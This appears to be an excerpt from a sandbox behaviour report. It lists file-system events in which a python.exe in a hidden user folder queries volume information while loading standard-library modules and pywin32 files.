Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\__init__.cpython-311.pyc.1470110094000 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\aliases.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\aliases.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\aliases.cpython-311.pyc.1470110094384 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\utf_8.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\utf_8.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\utf_8.cpython-311.pyc.1470110364208 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\cp1252.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\cp1252.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\cp1252.cpython-311.pyc.1470110364976 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\distutils-precedence.pth VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-311.pyc.1470109845808 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pywin32.pth VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-311.pyc.1470109846240 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\DLLs VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.sysinfo VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.sysinfo VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.sysinfo VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.sysinfo VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.sysinfo VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\base64.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\base64.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\base64.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\base64.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\base64.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\base64.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\base64.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\base64.cpython-311.pyc.1470109638912 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\__init__.cpython-311.pyc.1470109641040 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\enum.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\enum.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\enum.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\enum.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\enum.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\enum.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\enum.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\enum.cpython-311.pyc.1470109642384 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\types.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\types.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\types.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\types.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\types.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\types.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\types.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\types.cpython-311.pyc.1470109643168 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\operator.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\operator.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\operator.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\operator.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\operator.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\operator.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\operator.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\operator.cpython-311.pyc.1470109643168 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\functools.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\functools.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\functools.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\functools.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\functools.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\functools.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\functools.cpython-311.pyc.1470109645968 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\__init__.cpython-311.pyc.1470113935920 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\keyword.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\keyword.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\keyword.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\keyword.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\keyword.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\keyword.cpython-311.pyc.1470113952160 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\reprlib.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\reprlib.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\reprlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\reprlib.cpython-311.pyc.1470113952048 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_compiler.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_compiler.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_compiler.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_compiler.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_compiler.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_compiler.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_compiler.cpython-311.pyc.1470113588400 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_parser.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_parser.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_parser.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_parser.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_parser.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_parser.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_parser.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_parser.cpython-311.pyc.1470113950928 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_constants.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_constants.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_constants.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_constants.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_constants.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_constants.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_constants.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_constants.cpython-311.pyc.1470113588400 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_casefix.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_casefix.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_casefix.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_casefix.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_casefix.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_casefix.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_casefix.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_casefix.cpython-311.pyc.1470113954512 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\copyreg.cpython-311.pyc VolumeInformation
